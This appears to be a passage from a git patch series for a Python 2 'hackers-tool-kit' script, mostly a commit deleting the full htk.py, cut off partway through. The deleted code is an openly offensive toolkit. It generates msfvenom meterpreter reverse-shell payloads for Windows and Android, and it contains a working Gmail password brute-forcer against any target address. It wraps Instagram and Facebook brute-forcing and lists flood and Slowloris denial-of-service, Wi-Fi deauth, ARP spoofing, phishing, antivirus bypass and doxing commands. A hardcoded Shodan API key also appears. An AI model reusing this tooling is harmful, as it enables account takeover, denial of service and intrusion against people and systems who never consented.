!\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From ea704de5929ccfc2c1f4039323a4f533c64e8afb Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 22:05:32 +0100 Subject: [PATCH 120/214] Delete htk.py --- htk.py | 2740 -------------------------------------------------------- 1 file changed, 2740 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 72131e3..0000000 --- a/htk.py +++ /dev/null @@ -1,2740 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[9msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php1m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,7) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file ] -phpload : make a php reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) 